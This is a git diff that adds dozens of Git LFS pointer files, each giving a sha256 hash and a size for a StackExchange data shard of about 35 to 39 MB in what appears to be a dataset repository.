a/data/stackexchange/1-1/1905_2289.jsonl b/data/stackexchange/1-1/1905_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e76f9d46af1fcae9b3c24414acbb738e7909e6b --- /dev/null +++ b/data/stackexchange/1-1/1905_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ed668793b8a8d5577823ceb22d7912ab331b20d09427b52f5c5bb2cfa34ad3c +size 35486841 diff --git a/data/stackexchange/1-1/1906_2289.jsonl b/data/stackexchange/1-1/1906_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d39e819cdb1ce72e0dd48ad1801061e16b7badbc --- /dev/null +++ b/data/stackexchange/1-1/1906_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b022a93bc48a08e4ec560a65c6d731a06bcb2251702e277415058599c43e6cb +size 35834285 diff --git a/data/stackexchange/1-1/1907_2289.jsonl b/data/stackexchange/1-1/1907_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67bd5170a472073e368f875738f239de73f49390 --- /dev/null +++ b/data/stackexchange/1-1/1907_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7cff43a8ef80fcb28d8580ba517b8da5caf55cee5533503b3a86873550b21a +size 35983970 diff --git a/data/stackexchange/1-1/1908_2289.jsonl b/data/stackexchange/1-1/1908_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..684237f89638a7ce83f4cfa3f25f57a65a9e9bd0 --- /dev/null +++ b/data/stackexchange/1-1/1908_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4abff2c0f4d0fb68c6290a480e26089e49d32daca38d6f7ef9cf076a66921fc1 +size 36074574 diff --git a/data/stackexchange/1-1/1909_2289.jsonl b/data/stackexchange/1-1/1909_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1903435b06ed473c11ac4b93312db12346f31a43 --- /dev/null +++ b/data/stackexchange/1-1/1909_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa6f53ebbc97c0e350c378e1fabceadf0a53bd82423a83bd82ca72c2255fb4ee +size 35505878 diff --git a/data/stackexchange/1-1/190_2289.jsonl b/data/stackexchange/1-1/190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c52631d8c94bb896c3f81aa623862f80017a3959 --- /dev/null +++ b/data/stackexchange/1-1/190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f63df2ea36ceea27786796244dca3ed72081fa7b20fcaab8c000647fb317d218 +size 34847796 diff --git a/data/stackexchange/1-1/1910_2289.jsonl b/data/stackexchange/1-1/1910_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..aa16f91e62422b504344c8fc948d7b436b7d9eb4 --- /dev/null +++ b/data/stackexchange/1-1/1910_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b5a47c7c61dc535d0a59c33e70ab42816f5b0f1f92f5772beabd7fb95471d7a +size 35431340 diff --git a/data/stackexchange/1-1/1911_2289.jsonl b/data/stackexchange/1-1/1911_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fb9497d1faf51e3154a72286f007b09e9731fda --- /dev/null +++ b/data/stackexchange/1-1/1911_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d9774dd0dedd4d9c9c6fe1847084064d4a94fc2a224110223e250249f3ef6b7 +size 36126100 diff --git a/data/stackexchange/1-1/1912_2289.jsonl b/data/stackexchange/1-1/1912_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29490dad7a260a03623e048f5b5ef53991bdf127 --- /dev/null +++ b/data/stackexchange/1-1/1912_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e0ae45a87b24537d3d55408422b9c94b888ca513d679abe8dfc92a7f8fb1e3d +size 35649985 diff --git a/data/stackexchange/1-1/1913_2289.jsonl b/data/stackexchange/1-1/1913_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5c43679942554c4fd20e7ed9e26c784271712ea --- /dev/null +++ b/data/stackexchange/1-1/1913_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf9cf0d25e21c2ab581f950a0e03156c2d94e8734b5d445f26958381c1ea4370 +size 36158075 diff --git a/data/stackexchange/1-1/1914_2289.jsonl b/data/stackexchange/1-1/1914_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ffa951392f49e4bc906b897f72feb03e0154b3b --- /dev/null +++ b/data/stackexchange/1-1/1914_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:090b095dd15d14f43f456d06c1a9a02e09d400548ab397c6a43ec3868c024032 +size 36202720 diff --git a/data/stackexchange/1-1/1915_2289.jsonl b/data/stackexchange/1-1/1915_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d86f9cf45e0a1bd64bd9f5b2ed77d53ad2456b0b --- /dev/null +++ b/data/stackexchange/1-1/1915_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6613b7f831b5bbe277b25898907d2e3f2fb8321e0c16d9df4f0e525e170dc9c6 +size 35717765 diff --git a/data/stackexchange/1-1/1916_2289.jsonl b/data/stackexchange/1-1/1916_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63c5afd94078c2c9badb521c0014e46cbb973915 --- /dev/null +++ b/data/stackexchange/1-1/1916_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94faa8e2629839f1ea35e12810ca37634561294179bd21f3cf52d6a412db7cc1 +size 35484621 diff --git a/data/stackexchange/1-1/1917_2289.jsonl b/data/stackexchange/1-1/1917_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76d4740ba3d652f84a2897d1a198488e22540ba3 --- /dev/null +++ b/data/stackexchange/1-1/1917_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9333decc1e2b89cd0c29a5f10f1a48f2dee5d976aaae3b0ee697a24a30bd15f6 +size 36084592 diff --git a/data/stackexchange/1-1/1918_2289.jsonl b/data/stackexchange/1-1/1918_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f450f6c54adcc31c960a5a84ef40e70cba6ad5a --- /dev/null +++ b/data/stackexchange/1-1/1918_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bc543dd0adf3bebbce4cf92c9e17ce03fa1bdd8ea492f127016c44575a2bdf48 +size 36133357 diff --git a/data/stackexchange/1-1/1919_2289.jsonl b/data/stackexchange/1-1/1919_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e58945785ec473ea35e8bd0e313bcb929144b017 --- /dev/null +++ b/data/stackexchange/1-1/1919_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c16f414b76029b874d4bc5d2e688e189a33ee49e674c5afd1b34ece1ea402149 +size 36209858 diff --git a/data/stackexchange/1-1/191_2289.jsonl b/data/stackexchange/1-1/191_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ab3e0e2f4fc7514d3b2910e452cb1780506fc87 --- /dev/null +++ b/data/stackexchange/1-1/191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38f9e08396fd9d43713688a227a8595218d23cd21628f27a0d26184c7fd65c2c +size 35000159 diff --git a/data/stackexchange/1-1/1920_2289.jsonl b/data/stackexchange/1-1/1920_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d88488ab3bfac4cba3709f4b64070cf635419665 --- /dev/null +++ b/data/stackexchange/1-1/1920_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b9964dca878b2a8baead3a7f54b15d026565e748839072a15455b332a90677e +size 36150315 diff --git a/data/stackexchange/1-1/1921_2289.jsonl b/data/stackexchange/1-1/1921_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e50484bf2f0030e02d915d35590f790a5f1a0c0a --- /dev/null +++ b/data/stackexchange/1-1/1921_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:544fc93288fb8d4f97c0967f649a1183a60d60d2679e4a1c1a2137b585decbd3 +size 35740013 diff --git a/data/stackexchange/1-1/1922_2289.jsonl b/data/stackexchange/1-1/1922_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31b4ff120059dfcd39bae75879e7a9f547eaaffe --- /dev/null +++ b/data/stackexchange/1-1/1922_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6efd013d530770f4aa0ba290e74801cb52869c792059f3bcc33b5741d553f7eb +size 35914252 diff --git a/data/stackexchange/1-1/1923_2289.jsonl b/data/stackexchange/1-1/1923_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..378ff4edb093acb3edb930c5557136076a82f29c --- /dev/null +++ b/data/stackexchange/1-1/1923_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02967366b5fb4845c23d59191553bb692c36f2faccc0b225fca1c2bef0ab95f7 +size 36454778 diff --git a/data/stackexchange/1-1/1924_2289.jsonl b/data/stackexchange/1-1/1924_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9272defd645aac8b5412b7a6e7839c5e1f26635f --- /dev/null +++ b/data/stackexchange/1-1/1924_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16c681321fd60f31d685226acd09a288404dd480026fc350027ecfe51aa44ede +size 36591141 diff --git a/data/stackexchange/1-1/1925_2289.jsonl b/data/stackexchange/1-1/1925_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a61ee45d2edd5deefe99bcc8423d59cc114bae4 --- /dev/null +++ b/data/stackexchange/1-1/1925_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6db7aece32d97b777e71c3337b4becab871bf41db77e0c72a5a14cc8da03a6d5 +size 35993062 diff --git a/data/stackexchange/1-1/1926_2289.jsonl b/data/stackexchange/1-1/1926_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d1968935f15670ecb17aab34187bbfff66c97119 --- /dev/null +++ b/data/stackexchange/1-1/1926_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f65b2fd2426dccada17a4cd05391dcae804daab874027787772ea15d433de1cd +size 36588846 diff --git a/data/stackexchange/1-1/1927_2289.jsonl b/data/stackexchange/1-1/1927_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eebffba45c4100736bdf060f3a29791ef9a7ff09 --- /dev/null +++ b/data/stackexchange/1-1/1927_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15b8aa20cd527cdcd0c2ddcd4ae18cdb54490b8ab90f245a90d9e0b7f22b429f +size 36138954 diff --git a/data/stackexchange/1-1/1928_2289.jsonl b/data/stackexchange/1-1/1928_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d22aaf15b193b4cd24bd1765e31fcf957f1f6dd9 --- /dev/null +++ b/data/stackexchange/1-1/1928_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fc49a20cde24aa400de5a3db0a4e5d2ec7c7750bdb3aa91834c25d15b8efaed +size 35872645 diff --git a/data/stackexchange/1-1/1929_2289.jsonl b/data/stackexchange/1-1/1929_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1dee12f24830c2eb187231df846b52c8d9ac5b4 --- /dev/null +++ b/data/stackexchange/1-1/1929_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2728ceb756c6294f866e4f28c1ac2fdb7fdec95774c58bf54d646b6e8dcd3253 +size 35953165 diff --git a/data/stackexchange/1-1/192_2289.jsonl b/data/stackexchange/1-1/192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..949642d3882aa00e37d8d33bfe0ec17a09cfb65f --- /dev/null +++ b/data/stackexchange/1-1/192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35b29c52ad93f7c14ffae1647558c121ea4e6f15c2acbc99500b9d7af0995727 +size 35187705 diff --git a/data/stackexchange/1-1/1930_2289.jsonl b/data/stackexchange/1-1/1930_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53d89edcbf3b0ea1a81363ea4ad6bfd1b4295519 --- /dev/null +++ b/data/stackexchange/1-1/1930_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf32aeca9debc26f00b67d18d27498e23f585bdf7169aa0bf7b19519ee71bb02 +size 35920902 diff --git a/data/stackexchange/1-1/1931_2289.jsonl b/data/stackexchange/1-1/1931_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5efb8f86a310bc0740dc75326400fbd24049e29 --- /dev/null +++ b/data/stackexchange/1-1/1931_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8bac7038e30834b7598a08819ba87ce53d4cb61fd39570c8f9ba19f6d2a32841 +size 35537025 diff --git a/data/stackexchange/1-1/1932_2289.jsonl b/data/stackexchange/1-1/1932_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e84855e9da571374af3ef364ed70c78e4150409 --- /dev/null +++ b/data/stackexchange/1-1/1932_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64c5761f7220325fe5fc5611bac49542b1c7c1afaa0579198a255fc9772106b +size 35856199 diff --git a/data/stackexchange/1-1/1933_2289.jsonl b/data/stackexchange/1-1/1933_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..839a455929dd74b3a88f49ba5d7e3006158a3d93 --- /dev/null +++ b/data/stackexchange/1-1/1933_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c070c1605ac28d5af03b252baa39fb199b61b974d9c7cbe128c743a30b723cde +size 36319736 diff --git a/data/stackexchange/1-1/1934_2289.jsonl b/data/stackexchange/1-1/1934_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a594e66db4eb6f2467319657478fcdae04a25def --- /dev/null +++ b/data/stackexchange/1-1/1934_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc5a1ff9a01de0c12e985719d890685364e4af73d7d78c99f8c038f197b2696a +size 35634048 diff --git a/data/stackexchange/1-1/1935_2289.jsonl b/data/stackexchange/1-1/1935_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe9f2cb2341aa325dad9385c92e28d9d11293eeb --- /dev/null +++ b/data/stackexchange/1-1/1935_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4854c01d0d5ef83ad5f9f9b76bffd843a3b2d45087b499b254d45b0bd7f7176 +size 36207489 diff --git a/data/stackexchange/1-1/1936_2289.jsonl b/data/stackexchange/1-1/1936_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af55db6d2c658a7ba75c63f45ea5dbb606f09fce --- /dev/null +++ b/data/stackexchange/1-1/1936_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62383dc19d44ef3843b8c72a12c4e8698f9b7b7b486be0ec709f1056e2a8d713 +size 35644839 diff --git a/data/stackexchange/1-1/1937_2289.jsonl b/data/stackexchange/1-1/1937_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6b7409e9f28ea373d1e9f2c9f093bffca7ced7e --- /dev/null +++ b/data/stackexchange/1-1/1937_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8ce1beb95cc8ce6fa0e178a3ee67bfee8ae304ba9b6b514dc50c84134067919 +size 35921766 diff --git a/data/stackexchange/1-1/1938_2289.jsonl b/data/stackexchange/1-1/1938_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f70dfed4687b97a5d2bc5a23bbcd6fd29d83ea6c --- /dev/null +++ b/data/stackexchange/1-1/1938_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:597c982b21c20645d97b51a3254855309bdc486a74d37a8dc9f712a793a504d0 +size 35668149 diff --git a/data/stackexchange/1-1/1939_2289.jsonl b/data/stackexchange/1-1/1939_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a248e7c906ea4eba154d050d968bfd75aad14d3e --- /dev/null +++ b/data/stackexchange/1-1/1939_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:807e7d019ad882b820a4b051965d34a71475e696e17384508733125a379d648a +size 37489199 diff --git a/data/stackexchange/1-1/193_2289.jsonl b/data/stackexchange/1-1/193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6dcef34004414c793f41c8a08f4cd0e7a0435fd --- /dev/null +++ b/data/stackexchange/1-1/193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f97195ea5c5257a18be79628119a7b3e797ffcd9482f5f7b5f1f84ae721d3191 +size 34652197 diff --git a/data/stackexchange/1-1/1940_2289.jsonl b/data/stackexchange/1-1/1940_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..330a2bb6bd3b12ce16ccfdd8a34d2de9ded1bd87 --- /dev/null +++ b/data/stackexchange/1-1/1940_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffbb905bab85a944f7a4d85f24ee794a53518829ebbd856e789a7aac28f64102 +size 38056271 diff --git a/data/stackexchange/1-1/1941_2289.jsonl b/data/stackexchange/1-1/1941_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..350153c93dc22f134cd58a02294138ce8d3e1981 --- /dev/null +++ b/data/stackexchange/1-1/1941_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d8e1fdcd471fcac0a9620e2e408d5fe8d1c135ac2fec9ae8492e5c79bb8ee0f +size 38015858 diff --git a/data/stackexchange/1-1/1942_2289.jsonl b/data/stackexchange/1-1/1942_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a9794ec9e633dc6f50f00f6a2a8de8cfd08cc08 --- /dev/null +++ b/data/stackexchange/1-1/1942_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb5a16805ebb319433e83dccf040634ef76bcde654e9bdc883e89e3fa19b140 +size 37765627 diff --git a/data/stackexchange/1-1/1943_2289.jsonl b/data/stackexchange/1-1/1943_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..289c71d23f05becd5b9f8055934e2a2794de58d6 --- /dev/null +++ b/data/stackexchange/1-1/1943_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f79d7a3d19f4c827ad568926a6655ebab65ebe43e0767157d8b4c8960a109a5a +size 38579387 diff --git a/data/stackexchange/1-1/1944_2289.jsonl b/data/stackexchange/1-1/1944_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..836943215d2be58c37041dc461a3ce17f229333b --- /dev/null +++ b/data/stackexchange/1-1/1944_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79e3ce2b2def8389cf11fbd942f90326b998e924d4face413ca0ecaa9f4a3e70 +size 38008503 diff --git a/data/stackexchange/1-1/1945_2289.jsonl b/data/stackexchange/1-1/1945_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7343e5c03925b2d516893bd2019ec4b61ebf01ad --- /dev/null +++ b/data/stackexchange/1-1/1945_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9632de2db49523211c4d2eef461cb4c01c6da64340a870059e095a01b51cfd66 +size 38138420 diff --git a/data/stackexchange/1-1/1946_2289.jsonl b/data/stackexchange/1-1/1946_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cc64b40907d066f02c265c8f7d8760a7d700456 --- /dev/null +++ b/data/stackexchange/1-1/1946_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c55b3fa99ce46666f96a2fda8a50224a121998a173937b94c97f011531fbfbf +size 38287532 diff --git a/data/stackexchange/1-1/1947_2289.jsonl b/data/stackexchange/1-1/1947_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1e157dc727a9097e916c4a5b3774fa2d0ed67097 --- /dev/null +++ b/data/stackexchange/1-1/1947_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:335a911b0d390c827e059daf0b9e55c71f527de34afc0dd2d243bbd6d05937f3 +size 37858953 diff --git a/data/stackexchange/1-1/1948_2289.jsonl b/data/stackexchange/1-1/1948_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ee23f7cbefc7fe0c00952e5bc1efb765ae5219c --- /dev/null +++ b/data/stackexchange/1-1/1948_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ea93963af6b5dabf170faeab3743bfb7d145f730d63708d984bdd4c0aa2c8c2 +size 38060353 diff --git a/data/stackexchange/1-1/1949_2289.jsonl b/data/stackexchange/1-1/1949_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e2a24ecb1273d060f1894575050fdd23d998adf --- /dev/null +++ b/data/stackexchange/1-1/1949_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:cfd2afa591e2a6e980bc1cfdfd48b1c249f485741212e53e709f4b4f48c1117a +size 37635913 diff --git a/data/stackexchange/1-1/194_2289.jsonl b/data/stackexchange/1-1/194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69ec172114f858d35dbd127b3c48a919aa949649 --- /dev/null +++ b/data/stackexchange/1-1/194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7538eb6cb4f082491bf091e5316c891a32da6a7851bf35a0f012001d39efcec9 +size 35369791 diff --git a/data/stackexchange/1-1/1950_2289.jsonl b/data/stackexchange/1-1/1950_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84a826baa51cea90aab5ca9138e852f360cd6530 --- /dev/null +++ b/data/stackexchange/1-1/1950_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4cbf4ce1952ba378b794fbc4a6ba35f849b3f6f17175a7c1becaf2641023706e +size 38479558 diff --git a/data/stackexchange/1-1/1951_2289.jsonl b/data/stackexchange/1-1/1951_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cde63b68f941f52082bc7c1ecee1a38cc9ffe950 --- /dev/null +++ b/data/stackexchange/1-1/1951_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af5c3a0c37b84996f1453328225eed31b9bcde97509bf18b3462cab8ae335d96 +size 38387493 diff --git a/data/stackexchange/1-1/1952_2289.jsonl b/data/stackexchange/1-1/1952_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e58eb5565c328bacd7b5ff928e85cc81952a002 --- /dev/null +++ b/data/stackexchange/1-1/1952_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd3fc4ce7832d1b854ca9b686db20e2a41de549d913ee029bfad274cf46fc75c +size 38267780 diff --git a/data/stackexchange/1-1/1953_2289.jsonl b/data/stackexchange/1-1/1953_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78addb1356d71777a89f7abd32497cff69af70e7 --- /dev/null +++ b/data/stackexchange/1-1/1953_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6889e6c416c4bf3ff89096932177766781a51fa86ac0a87da56ee63c95eea32 +size 38174403 diff --git a/data/stackexchange/1-1/1954_2289.jsonl b/data/stackexchange/1-1/1954_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4315f7f84a2b905068b02fcce0b1e530a386385b --- /dev/null +++ b/data/stackexchange/1-1/1954_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22ef646b4b86402f768fabbce9ce07e3d231a5e339d88be74a67904285c92ad5 +size 37764125 diff --git a/data/stackexchange/1-1/1955_2289.jsonl b/data/stackexchange/1-1/1955_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c717cf35bcec5a44bd8be2ba7a3469cbf19116a2 --- /dev/null +++ b/data/stackexchange/1-1/1955_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34b9ce7b9913ce6086f95b60c519178af3dcb7f6afc645d9e98be559dd90c4ab +size 38178444 diff --git a/data/stackexchange/1-1/1956_2289.jsonl b/data/stackexchange/1-1/1956_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1dea58bb263e53d3a1bdbe2e6e2515734796b0e --- /dev/null +++ b/data/stackexchange/1-1/1956_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14be8f68cfb478a792c2496bae65bd6f2af323f3b86ec1c802c3cc3685923ad4 +size 39037021 diff --git a/data/stackexchange/1-1/1957_2289.jsonl b/data/stackexchange/1-1/1957_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..45acbb347acd987e2ad5599238f8f6b7ab3027e5 --- /dev/null +++ b/data/stackexchange/1-1/1957_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c0179ef0c50f867f7a7f02a74e81ce4cc3bb52c6738986df1cc6c46818a4fd6 +size 37476199 diff --git a/data/stackexchange/1-1/1958_2289.jsonl b/data/stackexchange/1-1/1958_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78372716baa504192e67512e26a6627d45ac3d15 --- /dev/null +++ b/data/stackexchange/1-1/1958_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4936b4f4623abe87604cb56ac6afde548f6adb4b7ac21e1f587fed237220f580 +size 38350428 diff --git a/data/stackexchange/1-1/1959_2289.jsonl b/data/stackexchange/1-1/1959_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a2135edba77dc8a9514da46462b4e471354440e --- /dev/null +++ b/data/stackexchange/1-1/1959_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38646cd69e4d1e35b0c28717696d48fd2ba3218a14b56c1f9756eb4d86fdd62b +size 37933655 diff --git a/data/stackexchange/1-1/195_2289.jsonl b/data/stackexchange/1-1/195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7417a9490656f0470f9f5fe5a8048202bb6985d8 --- /dev/null +++ b/data/stackexchange/1-1/195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7400a47f82ba48561f95476139d5977b94d52a1c94b388150eb2caedd904f886 +size 34763159 diff --git a/data/stackexchange/1-1/1960_2289.jsonl b/data/stackexchange/1-1/1960_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b1080557be3afce3a8173228a2f2846b2fe4d01 --- /dev/null +++ b/data/stackexchange/1-1/1960_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd39c4da497d899d391d68fde9e820904e1972a124f174b9bbcb6591788a3c1 +size 37796822 diff --git a/data/stackexchange/1-1/1961_2289.jsonl b/data/stackexchange/1-1/1961_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6feae4825b980fecaba082210652a0fa5bc1905e --- /dev/null +++ b/data/stackexchange/1-1/1961_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e82052691c086de5bf8bb6704a89bbbc32a0db653c1d978cb0311dcb9be240a4 +size 37691233 diff --git a/data/stackexchange/1-1/1962_2289.jsonl b/data/stackexchange/1-1/1962_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8cabc8af8a6ec1e247e226a1fff99590208d32e --- /dev/null +++ b/data/stackexchange/1-1/1962_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77ea54c2ac09f62cfc9a12f80582b89d481219536145d360f5c28e8c051b0519 +size 37884139 diff --git a/data/stackexchange/1-1/1963_2289.jsonl b/data/stackexchange/1-1/1963_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..934e79532e6ed11836fe739e065d7cdeb750a61f --- /dev/null +++ b/data/stackexchange/1-1/1963_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d0c2a84a342a7d34f5bd09bf8ad38f75c78473d39eedf3580848115601ff1f4 +size 38661370 diff --git 